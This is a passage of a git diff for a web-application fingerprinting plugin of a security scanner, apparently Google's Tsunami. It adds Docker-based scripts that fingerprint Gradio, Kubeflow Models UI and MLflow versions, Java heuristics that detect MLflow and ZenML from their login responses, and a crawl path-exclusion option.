"${ALL_VERSIONS[@]}"; do + echo "Fingerprinting Gradio version ${gradio_version} ..." + # Start a live instance of Gradio. + startGradio "${gradio_version}" + # Arbitrarily chosen so that Gradio is up and running. + echo "Waiting for Gradio ${gradio_version} to be ready ..." + sleep 30 + + # Checkout the repository to the correct tag. + checkOutRepo "${GIT_REPO}" "gradio@${gradio_version}" + + updateFingerprint \ + "gradio" \ + "${gradio_version}" \ + "${FINGERPRINTS_PATH}" \ + "${GIT_REPO}/js/app/public/" \ + "http://localhost:8000" + + # Stop the live instance of Gradio. + stopGradio "${gradio_version}" +done + +convertFingerprint "${JSON_DATA}" "${BIN_DATA}" + +echo "Fingerprint updated for Gradio. Please commit the following file:" +echo " ${BIN_DATA}" diff --git a/google/fingerprinters/web/scripts/updater/community/gradio/versions.txt b/google/fingerprinters/web/scripts/updater/community/gradio/versions.txt new file mode 100644 index 000000000..8a28d3bcb --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/gradio/versions.txt @@ -0,0 +1,79 @@ +4.36.1 +4.36.0 +4.35.0 +4.33.0 +4.32.2 +4.32.1 +4.32.0 +4.31.5 +4.31.4 +4.31.3 +4.31.2 +4.31.1 +4.31.0 +4.29.0 +4.28.3 +4.28.2 +4.28.1 +4.28.0 +4.27.0 +4.26.0 +4.25.0 +4.24.0 +4.23.0 +4.22.0 +4.21.0 +4.20.1 +4.20.0 +4.19.2 +4.19.1 +4.19.0 +4.18.0 +4.17.0 +4.16.0 +4.15.0 +4.14.0 +4.13.0 +4.12.0 +4.11.0 +4.10.0 +4.9.1 +4.9.0 +4.8.0 +4.7.0 +4.5.0 +4.4.1 +4.4.0 +4.3.0 +4.2.0 +4.1.2 +4.1.1 +4.1.0 +4.0.2 +4.0.1 +4.0.0 +4.0.0-beta.15 +3.50.2 +3.50.1 +3.50.0 +3.49.0 +3.48.0 +3.47.1 +3.47.0 +3.46.1 +3.46.0 +3.45.2 +3.45.1 +3.45.0 +3.44.4 +3.44.3 +3.44.2 +3.44.1 +3.44.0 +3.43.2 +3.43.1 +3.43.0 +3.42.0 +3.41.2 +3.41.1 +3.41.0 \ No newline at end of file diff --git a/google/fingerprinters/web/scripts/updater/community/kubeflow/app/Dockerfile.kind b/google/fingerprinters/web/scripts/updater/community/kubeflow/app/Dockerfile.kind new file mode 100644 index 000000000..ac28c213c --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/kubeflow/app/Dockerfile.kind @@ -0,0 +1,36 @@ +FROM alpine:3.8 + +RUN apk add --no-cache \ + bash \ + curl \ + docker \ + git \ + jq \ + openssl \ + shadow \ + vim \ + wget + +# Add Limited user +RUN groupadd -r kinduser \ + -g 777 && \ + useradd -c "kinduser runner account" \ + -g kinduser \ + -u 777 \ + -m \ + -r \ + kinduser && \ + usermod -aG docker kinduser + + +RUN curl -LO https://storage.googleapis.com/kubernetes-release/release/v1.17.0/bin/linux/amd64/kubectl && \ + chmod +x ./kubectl && \ + mv ./kubectl /usr/local/bin/kubectl + +# Install Kubernetes in Docker (kind) +RUN curl -Lo ./kind https://github.com/kubernetes-sigs/kind/releases/download/v0.7.0/kind-linux-amd64 && \ + chmod +x ./kind && \ + mv ./kind /usr/local/bin/kind + +EXPOSE 58080 +WORKDIR /src diff --git a/google/fingerprinters/web/scripts/updater/community/kubeflow/app/app_startup.sh b/google/fingerprinters/web/scripts/updater/community/kubeflow/app/app_startup.sh new file mode 100644 index 000000000..8aa6cf8e3 --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/kubeflow/app/app_startup.sh @@ -0,0 +1,32 @@ +#!/bin/bash + +while [ ! -f /lockconfig/lock ]; do + echo "Waiting for the file to be created by cluster" + sleep 2 +done + +# Define the Gunicorn start command +GUNICORN_CMD="gunicorn -w 3 --bind 0.0.0.0:5000 --access-logfile - entrypoint:app" + +# Function to start Gunicorn +start_gunicorn() { + echo "Starting Gunicorn..." + $GUNICORN_CMD +} + +# Function to monitor and restart Gunicorn if it exits +monitor_gunicorn() { + while true; do + start_gunicorn + + # Wait for Gunicorn to exit + wait $! + + # Log the exit and attempt a restart + echo "Gunicorn exited. Restarting..." + sleep 1 # Optional sleep before restarting + done +} + +# Start monitoring Gunicorn +monitor_gunicorn diff --git a/google/fingerprinters/web/scripts/updater/community/kubeflow/app/docker-compose.yml b/google/fingerprinters/web/scripts/updater/community/kubeflow/app/docker-compose.yml new file mode 100644 index 000000000..089f8e77b --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/kubeflow/app/docker-compose.yml @@ -0,0 +1,41 @@ +version: '3.7' + +services: + kind: + image: kind_cluster:latest + privileged: true + volumes: + - /var/run/docker.sock:/var/run/docker.sock + - kubeconfig:/root/.kube/ + - lockconfig:/lockconfig + - ./kind_startup.sh:/src/startup.sh + entrypoint: /bin/sh -c "chmod +x /src/startup.sh && /src/startup.sh" + healthcheck: + test: ["CMD", "test", "-f", "/lockconfig/lock"] + interval: 30s + timeout: 10s + retries: 20 + ports: + - "58080:58080" + environment: + - MODELS_WEB_APP_TAG=${MODELS_WEB_APP_TAG} + + kubeflow: + image: kubeflow-models-ui:${MODELS_WEB_APP_TAG} + depends_on: + - kind + ports: + - "8080:5000" + volumes: + - kubeconfig:/root/.kube/ + - lockconfig:/lockconfig + - ./app_startup.sh:/src/startup.sh + environment: + - APP_PREFIX=/ + - APP_DISABLE_AUTH=True + - APP_SECURE_COOKIES=False + + entrypoint: ["/bin/sh", "-c", "sleep 60 && chmod +x /src/startup.sh && /src/startup.sh"] +volumes: + kubeconfig: + lockconfig: diff --git a/google/fingerprinters/web/scripts/updater/community/kubeflow/app/kind_startup.sh b/google/fingerprinters/web/scripts/updater/community/kubeflow/app/kind_startup.sh new file mode 100644 index 000000000..1eb52e7ef --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/kubeflow/app/kind_startup.sh @@ -0,0 +1,51 @@ +#!/bin/sh + +export DOCKER_GATEWAY_IP=$(docker network inspect bridge --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}') +export KUBE_PROXY_PORT=58080 +export KUBECTL_INSECURE_SKIP_TLS_VERIFY=true + + +kubectl_proxy_on() { + kubectl config set-cluster proxy-cluster --server="http://${DOCKER_GATEWAY_IP}:${KUBE_PROXY_PORT}" + kubectl config set-context proxy-context --cluster=proxy-cluster --user=$(kubectl config view -o jsonpath='{.contexts[?(@.name == "'"$(kubectl config current-context)"'")].context.user}') + kubectl config use-context proxy-context + echo "Switched to use kubectl proxy" +} + +start_kubernetes_cluster() { + #delete if exists + kind delete cluster --name my-cluster + + #create cluster +cat </dev/null 2>&1 ; pwd -P)" +PROJECT_ROOT="$(cd -- "${SCRIPT_PATH}/../../../.." >/dev/null 2>&1 ; pwd -P)" +APP_PATH="${SCRIPT_PATH}/app" +TMP_DATA="/tmp/kubeflow_fingerprints" +GIT_REPO="${TMP_DATA}/repo" +FINGERPRINTS_PATH="${TMP_DATA}/fingerprints" +JSON_DATA="${FINGERPRINTS_PATH}/fingerprint.json" +BIN_DATA="${FINGERPRINTS_PATH}/fingerprint.binproto" +BINPROTO="${PROJECT_ROOT}/src/main/resources/fingerprinters/web/data/community/kubeflow.binproto" + +mkdir -p "${FINGERPRINTS_PATH}" + + +removeCluster(){ + docker rmi -f kind_cluster:latest +} +buildCluster() { + pushd "${APP_PATH}" >/dev/null + docker build -t kind_cluster:latest -f Dockerfile.kind . + popd >/dev/null +} + +buildKubeFlowImage(){ + local version="$1" + pushd "${GIT_REPO}" >/dev/null + docker build -t kubeflow-models-ui:${version} -f Dockerfile . + popd >/dev/null +} + +removeKubeFlowImage(){ + local version="$1" + docker rmi -f kubeflow-models-ui:${version} +} + +startKubeflow(){ + local version="$1" + pushd "${APP_PATH}" >/dev/null + MODELS_WEB_APP_TAG="${version}" docker-compose up -d + popd >/dev/null +} + +stopContainer(){ + local name="$1" + + CONTAINER_ID=$(docker ps | grep "${name}" | cut -d " " -f1) + if [ -n "$KUBEFLOW_CONTAINER" ]; then + docker stop $CONTAINER_ID + fi + +} + +stopKubeFlow(){ + local version="$1" + pushd "${APP_PATH}" >/dev/null + MODELS_WEB_APP_TAG="${version}" docker-compose down + stopContainer "kindest/node" + stopContainer "kubeflow-models-ui:${version}" + stopContainer "kind_cluster" + + popd >/dev/null +} + +waitForServer() { + local url="http://localhost:8080" + local wait_time="${2:-5}" + + echo "Waiting for server at $url to be available..." + + while true; do + http_response=$(curl --write-out "%{http_code}" --silent --output /dev/null "$url" || echo "failed") + if [ "$http_response" -eq 200 ]; then + echo "Server is up and running at $url!" + break + elif [ "$http_response" = "failed" ]; then + echo "Curl command failed. Waiting for $wait_time seconds before retrying..." + else + echo "Server not yet available (HTTP status: $http_response). Waiting for $wait_time seconds..." + fi + sleep "$wait_time" + done +} + + +#Build kuberentes cluster +buildCluster + +# Convert existing data file to a human-readable JSON file +convertFingerprint "${BINPROTO}" "${JSON_DATA}" + +# Clone Kubeflow Models UI repository if not already present +if [[ ! -d "${GIT_REPO}" ]]; then + git clone https://github.com/kserve/models-web-app.git "${GIT_REPO}" +fi + + +# Read all versions to be fingerprinted +readarray -t ALL_VERSIONS < "${SCRIPT_PATH}/versions.txt" + +# Update fingerprints for all listed versions +for app_version in "${ALL_VERSIONS[@]}"; do + echo "Fingerprinting Kubeflow Models UI version ${app_version} ..." + + # Checkout the repository to the correct tag + checkOutRepo "${GIT_REPO}" "v${app_version}" + + # Build and run the container + buildKubeFlowImage "${app_version}" + + # Start the cluser and kubeflow + startKubeflow "${app_version}" + + echo "Waiting for Kubeflow ${app_version} to be ready ..." + sleep 60 + + # Wait for the container to be fully up + waitForServer + + echo "Application is up, updating fingerprint." + + # Capture the fingerprints + updateFingerprint \ + "kubeflow" \ + "${app_version}" \ + "${FINGERPRINTS_PATH}" \ + "${GIT_REPO}" \ + "http://localhost:8080" + + # Stop and remove the container + stopKubeFlow "${app_version}" + + removeKubeFlowImage "${app_version}" + +done + +removeCluster + +# Convert the updated JSON data to binary proto format +convertFingerprint "${JSON_DATA}" "${BIN_DATA}" + +echo "Fingerprint updated for Kubeflow Models UI. Please commit the following file:" +echo " ${BIN_DATA}" +echo "to" +echo " ${BINPROTO}" diff --git a/google/fingerprinters/web/scripts/updater/community/kubeflow/versions.txt b/google/fingerprinters/web/scripts/updater/community/kubeflow/versions.txt new file mode 100644 index 000000000..527d9f1bd --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/kubeflow/versions.txt @@ -0,0 +1,5 @@ +0.7.0 +0.8.0 +0.9.0 +0.10.0 +0.13.0-rc.0 diff --git a/google/fingerprinters/web/scripts/updater/community/mlflow/app/docker-compose.yaml b/google/fingerprinters/web/scripts/updater/community/mlflow/app/docker-compose.yaml new file mode 100644 index 000000000..ca5931215 --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/mlflow/app/docker-compose.yaml @@ -0,0 +1,7 @@ +version: '2' +services: + mlflow: + image: ghcr.io/mlflow/mlflow:${MLFLOW_VERSION} + ports: + - "5000:5000" + command: sh -c "mlflow server --host 0.0.0.0 --port 5000" diff --git a/google/fingerprinters/web/scripts/updater/community/mlflow/update.sh b/google/fingerprinters/web/scripts/updater/community/mlflow/update.sh new file mode 100755 index 000000000..2f16abe5c --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/mlflow/update.sh @@ -0,0 +1,97 @@ +#!/usr/bin/env bash + +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +set -e + +source ../../common.sh + +SCRIPT_PATH="$(cd -- "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P)" +# Root path to the web fingerprinter plugin. +PROJECT_ROOT="$(cd -- "${SCRIPT_PATH}/../../../.." >/dev/null 2>&1 ; pwd -P)" +# Path to the configurations for starting a live instance of MLflow. +APP_PATH="${SCRIPT_PATH}/app" +# Path to the temporary data holder. +TMP_DATA="/tmp/mlflow_fingerprints" +# Path to the local git repository for MLflow codebase. +GIT_REPO="${TMP_DATA}/repo" +# Path to the directory of all the updated fingerprints data. +FINGERPRINTS_PATH="${TMP_DATA}/fingerprints" +# Json data of the final result. +JSON_DATA="${FINGERPRINTS_PATH}/fingerprint.json" +# Binary proto data of the final result. +BIN_DATA="${FINGERPRINTS_PATH}/fingerprint.binproto" +# Read all the versions to be fingerprinted. +readarray -t ALL_VERSIONS < "${SCRIPT_PATH}/versions.txt" + +mkdir -p "${FINGERPRINTS_PATH}" + +BINPROTO="${PROJECT_ROOT}/src/main/resources/fingerprinters/web/data/community/mlflow.binproto" + +StartMLflow() { + local version="$1" + pushd "${APP_PATH}" >/dev/null + MLFLOW_VERSION="${version}" docker-compose up -d + popd >/dev/null +} + +StopMLflow() { + local version="$1" + pushd "${APP_PATH}" >/dev/null + MLFLOW_VERSION="${version}" docker-compose down --volumes --remove-orphans + popd >/dev/null +} + +CreateFingerprintForMLflow() { + local mlflowVersion="$1" + + echo "Fingerprinting MLflow version ${mlflowVersion} ..." + # Start a live instance of MLflow. + StartMLflow "${mlflowVersion}" + + # Arbitrarily chosen so that MLflow is up and running. + echo "Waiting for MLflow ${mlflowVersion} to be ready ..." + sleep 20 + + # Checkout the repository to the correct tag. + checkOutRepo "${GIT_REPO}" "${mlflowVersion}" + + updateFingerprint \ + "mlflow" \ + "${mlflowVersion}" \ + "${FINGERPRINTS_PATH}" \ + "${GIT_REPO}/mlflow" \ + "http://localhost:5000" + + # Stop the live instance of MLflow. + StopMLflow "${mlflowVersion}" +} + +# Fetch MLflow codebase. +if [[ ! -d "${GIT_REPO}" ]] ; then + git clone https://github.com/mlflow/mlflow "${GIT_REPO}" +fi + +# Get versions +for mlflow_version in "${ALL_VERSIONS[@]}"; do + CreateFingerprintForMLflow "${mlflow_version}" +done + +convertFingerprint "${JSON_DATA}" "${BIN_DATA}" + +echo "Fingerprint updated for MLflow. Please commit the following file:" +echo " ${BIN_DATA}" +echo "to" +echo " ${BINPROTO}" diff --git a/google/fingerprinters/web/scripts/updater/community/mlflow/versions.txt b/google/fingerprinters/web/scripts/updater/community/mlflow/versions.txt new file mode 100644 index 000000000..850333570 --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/mlflow/versions.txt @@ -0,0 +1,30 @@ +v1.30.0 +v2.0.0rc0 +v2.0.0 +v2.0.1 +v2.1.0 +v2.1.1 +v2.2.0 +v2.2.1 +v2.2.2 +v2.3.0 +v2.3.1 +v2.3.2 +v2.4.0 +v2.4.1 +v2.4.2 +v2.5.0 +v2.6.0 +v2.7.0 +v2.7.1 +v2.8.1 +v2.9.0 +v2.9.1 +v2.9.2 +v2.10.0 +v2.10.1 +v2.10.2 +v2.11.0 +v2.11.1 +v2.11.2 +v2.11.3 diff --git a/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinter.java b/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinter.java index b6430a19d..4200c7b14 100644 --- a/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinter.java +++ b/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinter.java @@ -18,16 +18,24 @@ import static com.google.common.base.Preconditions.checkNotNull; import static com.google.common.collect.ImmutableList.toImmutableList; import static com.google.common.collect.ImmutableSet.toImmutableSet; +import static com.google.tsunami.common.net.http.HttpRequest.get; +import static com.google.tsunami.common.net.http.HttpRequest.post; import static java.util.stream.Collectors.joining; import com.google.common.collect.ImmutableMap; import com.google.common.collect.ImmutableSet; import com.google.common.flogger.GoogleLogger; +import com.google.protobuf.ByteString; +import com.google.tsunami.common.data.NetworkEndpointUtils; import com.google.tsunami.common.data.NetworkServiceUtils; -import com.google.tsunami.plugin.PluginType; -import com.google.tsunami.plugin.ServiceFingerprinter; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.common.net.http.HttpStatus; import com.google.tsunami.plugin.annotations.ForWebService; import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.ServiceFingerprinter; import com.google.tsunami.plugins.fingerprinters.web.crawl.Crawler; import com.google.tsunami.plugins.fingerprinters.web.crawl.ScopeUtils; import com.google.tsunami.plugins.fingerprinters.web.data.FingerprintData; @@ -36,6 +44,7 @@ import com.google.tsunami.plugins.fingerprinters.web.detection.SoftwareDetector.DetectedSoftware; import com.google.tsunami.plugins.fingerprinters.web.detection.VersionDetector; import com.google.tsunami.plugins.fingerprinters.web.detection.VersionDetector.DetectedVersion; +import com.google.tsunami.plugins.fingerprinters.web.proto.SoftwareIdentity; import com.google.tsunami.proto.CrawlConfig; import com.google.tsunami.proto.CrawlResult; import com.google.tsunami.proto.FingerprintingReport; @@ -47,8 +56,11 @@ import com.google.tsunami.proto.Version.VersionType; import com.google.tsunami.proto.VersionSet; import com.google.tsunami.proto.WebServiceContext; +import java.io.IOException; import java.util.Collection; +import java.util.HashSet; import java.util.Optional; +import java.util.Set; import javax.inject.Inject; /** A {@link ServiceFingerprinter} plugin that fingerprints web applications. */ @@ -69,6 +81,7 @@ public final class WebServiceFingerprinter implements ServiceFingerprinter { private final SoftwareDetector softwareDetector; private final VersionDetector.Factory versionDetectorFactory; private final WebServiceFingerprinterConfigs configs; + private final HttpClient httpClient; @Inject WebServiceFingerprinter( @@ -76,12 +89,14 @@ public final class WebServiceFingerprinter implements ServiceFingerprinter { Crawler crawler, SoftwareDetector softwareDetector, VersionDetector.Factory versionDetectorFactory, - WebServiceFingerprinterConfigs configs) { + WebServiceFingerprinterConfigs configs, + HttpClient httpClient) { this.fingerprintRegistry = checkNotNull(fingerprintRegistry); this.crawler = checkNotNull(crawler); this.softwareDetector = checkNotNull(softwareDetector); this.versionDetectorFactory = checkNotNull(versionDetectorFactory); this.configs = checkNotNull(configs); + this.httpClient = checkNotNull(httpClient); } @Override @@ -119,16 +134,11 @@ public FingerprintingReport fingerprint(TargetInfo targetInfo, NetworkService ne if (versionsBySoftware.isEmpty()) { logger.atInfo().log( - "WebServiceFingerprinter failed to confirm running web application on '%s'.", + "WebServiceFingerprinter failed to confirm running web application on '%s' using existing" + + " hashes. Try custom heuristics instead", startingUrl); - return FingerprintingReport.newBuilder() - .addNetworkServices( - addWebServiceContext( - networkService, - Optional.empty(), - Optional.empty(), - crawlResultsUnderRecordingLimit)) - .build(); + return fingerprintWithCustomHeuristics( + networkService, startingUrl, crawlResultsUnderRecordingLimit); } else { logger.atInfo().log( "WebServiceFingerprinter identified %d results for '%s'.", @@ -148,6 +158,48 @@ public FingerprintingReport fingerprint(TargetInfo targetInfo, NetworkService ne } } + private FingerprintingReport fingerprintWithCustomHeuristics( + NetworkService networkService, String startingUrl, ImmutableSet crawlResults) { + ImmutableSet detectedSoftware = + detectSoftwareByCustomHeuristics(networkService, startingUrl); + + if (detectedSoftware.isEmpty()) { + logger.atInfo().log( + "WebServiceFingerprinter failed to confirm running web application on '%s' using custom" + + " heuristics either.", + startingUrl); + return FingerprintingReport.newBuilder() + .addNetworkServices( + addWebServiceContext( + networkService, Optional.empty(), Optional.empty(), crawlResults)) + .build(); + } + + logger.atInfo().log( + "WebServiceFingerprinter discovered %d potential applications for '%s': [%s] using custom" + + " heuristics.", + detectedSoftware.size(), + startingUrl, + detectedSoftware.stream() + .map(software -> software.softwareIdentity().getSoftware()) + .collect(joining(","))); + return FingerprintingReport.newBuilder() + .addAllNetworkServices( + detectedSoftware.stream() + .map( + software -> + addWebServiceContext( + // Overwrite service name + networkService.toBuilder() + .setServiceName(software.softwareIdentity().getSoftware()) + .build(), + Optional.of(software), + Optional.empty(), + crawlResults)) + .collect(toImmutableList())) + .build(); + } + private ImmutableMap detectSoftwareVersions( Collection detectedSoftware, NetworkService networkService) { ImmutableMap.Builder versionsBySoftwareBuilder = @@ -222,4 +274,104 @@ private ImmutableSet crawlNetworkService( .build(); return crawler.crawl(crawlConfig); } + + private ImmutableSet detectSoftwareByCustomHeuristics( + NetworkService networkService, String startingUrl) { + HashSet detectedSoftware = new HashSet<>(); + + checkForMlflow(detectedSoftware, networkService, startingUrl); + checkForZenMl(detectedSoftware, networkService, startingUrl); + return ImmutableSet.copyOf(detectedSoftware); + } + + private void checkForMlflow( + Set software, NetworkService networkService, String startingUrl) { + logger.atInfo().log("probing Mlflow ping - custom fingerprint phase"); + + // We want to test weak credentials against mlflow versions above 2.5 which has basic + // authentication module.these versions return a 401 status code and a link to documentation + // about how to authenticate. + var uriAuthority = NetworkEndpointUtils.toUriAuthority(networkService.getNetworkEndpoint()); + var pingApiUrl = String.format("http://%s/%s", uriAuthority, "ping"); + try { + HttpResponse apiPingResponse = httpClient.send(get(pingApiUrl).withEmptyHeaders().build()); + + if (apiPingResponse.status() != HttpStatus.UNAUTHORIZED + || apiPingResponse.bodyString().isEmpty()) { + return; + } + + if (apiPingResponse + .bodyString() + .get() + .contains( + "You are not authenticated. Please see " + + "https://www.mlflow.org/docs/latest/auth/index.html" + + "#authenticating-to-mlflow " + + "on how to authenticate")) { + software.add( + DetectedSoftware.builder() + .setSoftwareIdentity(SoftwareIdentity.newBuilder().setSoftware("mlflow").build()) + .setRootPath(startingUrl) + .setContentHashes(ImmutableMap.of()) + .build()); + } + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", pingApiUrl); + } + } + + private void checkForZenMl( + Set software, NetworkService networkService, String startingUrl) { + logger.atInfo().log("probing ZenMl login page and login api - custom fingerprint phase"); + var uriAuthority = NetworkEndpointUtils.toUriAuthority(networkService.getNetworkEndpoint()); + + // we double-check both the api and login page + var loginApiUrl = String.format("http://%s/%s", uriAuthority, "api/v1/login"); + try { + // test login api with a random username and password and for sure not exist + HttpResponse apiLoginResponse = + httpClient.send( + post(loginApiUrl) + .setHeaders( + HttpHeaders.builder() + .addHeader("Content-Type", "application/x-www-form-urlencoded") + .build()) + .setRequestBody( + ByteString.copyFromUtf8( + "username=aHkPdMlQoWjRtBnX&password=aHkPdMlQoWjRtBnX")) + .build()); + + if (!(apiLoginResponse.status() == HttpStatus.UNAUTHORIZED + && apiLoginResponse.bodyString().isPresent() + && apiLoginResponse + .bodyString() + .get() + .equals( + "{\"detail\":[\"AuthorizationException\"," + + "\"Authentication error: invalid username or password\"]}"))) { + return; + } + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", loginApiUrl); + return; + } + + var loginUrl = String.format("http://%s/%s", uriAuthority, "login"); + try { + HttpResponse loginPageResponse = httpClient.send(get(loginUrl).withEmptyHeaders().build()); + if (!(loginPageResponse.bodyString().isPresent() + && loginPageResponse.bodyString().get().contains("ZenML Dashboard"))) { + return; + } + software.add( + DetectedSoftware.builder() + .setSoftwareIdentity(SoftwareIdentity.newBuilder().setSoftware("zenml").build()) + .setRootPath(startingUrl) + .setContentHashes(ImmutableMap.of()) + .build()); + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", loginUrl); + } + } } diff --git a/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinterConfigs.java b/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinterConfigs.java index cd431fee8..ce76612e5 100644 --- a/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinterConfigs.java +++ b/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinterConfigs.java @@ -33,8 +33,10 @@ public final class WebServiceFingerprinterConfigs { private static final ImmutableList DEFAULT_FILE_EXTENSION_EXCLUSIONS = ImmutableList.of("application/zip", "application/gzip"); - private final WebServiceFingerprinterCliOptions cliOptions; - private final WebServiceFingerprinterConfigProperties configProperties; + private static final ImmutableList DEFAULT_PATH_EXCLUSIONS = ImmutableList.of(); + + final WebServiceFingerprinterCliOptions cliOptions; + final WebServiceFingerprinterConfigProperties configProperties; @Inject WebServiceFingerprinterConfigs( @@ -95,8 +97,19 @@ public List getContentTypeExclusions() { } } + public List getPathExclusions() { + if (cliOptions.pathExclusions != null) { + return cliOptions.pathExclusions; + } else if (configProperties.pathExclusions != null) { + return configProperties.pathExclusions; + } else { + return DEFAULT_PATH_EXCLUSIONS; + } + } + + /** CLI options for {@link WebServiceFingerprinter}. */ @Parameters(separators = "=") - static final class WebServiceFingerprinterCliOptions implements CliOption { + public static final class WebServiceFingerprinterCliOptions implements CliOption { @Parameter( names = "--web-service-fingerprinter-enforce-crawling-scope-check", @@ -148,12 +161,18 @@ static final class WebServiceFingerprinterCliOptions implements CliOption { + "purpose.") List contentTypeExclusions; + @Parameter( + names = "--web-service-fingerprinter-crawl-path-exclusions", + description = "A comma separated list of path regexes to exclude during crawling.") + List pathExclusions; + @Override public void validate() {} } + /** Config properties for {@link WebServiceFingerprinter}. */ @ConfigProperties("plugins.google.fingerprinter.web") - static final class WebServiceFingerprinterConfigProperties { + public static final class WebServiceFingerprinterConfigProperties { /** * Configuration options for the {@code @@ -186,5 +205,11 @@ static final class WebServiceFingerprinterConfigProperties { * CLI flag's description for more details. */ List contentTypeExclusions; + + /** + * Configuration option for the @code --web-service-fingerprinter-crawl-path-exclusions} CLI + * flag. See the CLI flag's description for more details. + */ + List pathExclusions; } } diff --git a/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/crawl/CrawlConfigUtils.java b/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/crawl/CrawlConfigUtils.java index 9e5c12838..20c5029d8 100644 --- a/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/crawl/CrawlConfigUtils.java +++ b/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/crawl/CrawlConfigUtils.java @@ -19,6 +19,8 @@ import com.google.tsunami.proto.CrawlConfig; import com.google.tsunami.proto.CrawlTarget; +import java.util.List; +import java.util.regex.Pattern; /** Static utility methods pertaining to {@link CrawlConfig} proto buffer. */ final class CrawlConfigUtils { @@ -41,4 +43,13 @@ static boolean isCrawlTargetInScope(CrawlConfig crawlConfig, CrawlTarget crawlTa return !crawlConfig.getShouldEnforceScopeCheck() || crawlConfig.getScopesList().stream() .anyMatch(scope -> ScopeUtils.isInScope(scope, crawlTarget.getUrl())); } + + static boolean isCrawlTargetInBlockList(CrawlTarget crawlTarget, List pathExclusions) { + for (String regex : pathExclusions) { + if (Pattern.compile(regex).matcher(crawlTarget.getUrl()).find()) { + return true; + } + } + return false; + } } diff --git a/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/crawl/SimpleCrawlAction.java b/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/crawl/SimpleCrawlAction.java index b4546a744..5c087d8a3 100644 --- a/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/crawl/SimpleCrawlAction.java +++ b/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/crawl/SimpleCrawlAction.java @@ -28,6 +28,7 @@ import com.google.tsunami.common.net.http.HttpMethod; import com.google.tsunami.common.net.http.HttpRequest; import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.plugins.fingerprinters.web.WebServiceFingerprinterConfigs; import com.google.tsunami.proto.CrawlConfig; import com.google.tsunami.proto.CrawlResult; import com.google.tsunami.proto.CrawlTarget; @@ -62,18 +63,21 @@ final class SimpleCrawlAction extends RecursiveAction { private final CrawlConfig crawlConfig; private final CrawlTarget crawlTarget; private final SimpleCrawlerResults crawlerResults; + private final WebServiceFingerprinterConfigs configs; SimpleCrawlAction( int currentDepth, HttpClient httpClient, CrawlConfig crawlConfig, CrawlTarget crawlTarget, - SimpleCrawlerResults crawlerResults) { + SimpleCrawlerResults crawlerResults, + WebServiceFingerprinterConfigs configs) { this.currentDepth = currentDepth; this.httpClient = checkNotNull(httpClient); this.crawlConfig = checkNotNull(crawlConfig); this.crawlTarget = checkNotNull(crawlTarget); this.crawlerResults = checkNotNull(crawlerResults); + this.configs = checkNotNull(configs); } String getTargetUrl() { @@ -153,6 +157,10 @@ private void spawnNewCrawlActions(HttpResponse httpResponse) { .map(crawlTarget -> normalizeHost(crawlConfig, crawlTarget)) // Ignore out-of-scope URLs. .filter(crawlTarget -> CrawlConfigUtils.isCrawlTargetInScope(crawlConfig, crawlTarget)) + .filter( + crawlTarget -> + !CrawlConfigUtils.isCrawlTargetInBlockList( + crawlTarget, configs.getPathExclusions())) .map(this::newCrawlAction) .collect(toImmutableSet()); invokeAll(newCrawlActions); @@ -166,6 +174,6 @@ private static boolean isValidCrawlTarget(CrawlTarget crawlTarget) { private SimpleCrawlAction newCrawlAction(CrawlTarget newCrawlTarget) { return new SimpleCrawlAction( - currentDepth + 1, httpClient, crawlConfig, newCrawlTarget, crawlerResults); + currentDepth + 1, httpClient, crawlConfig, newCrawlTarget, crawlerResults, configs); } } diff --git a/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/crawl/SimpleCrawler.java b/google/fingerprinters/web/src/main/java/com/google/tsunami/plugins/fingerprinters/web/crawl/SimpleCrawler.java index c5ec5a4d8..4883a0eea 100644 --- 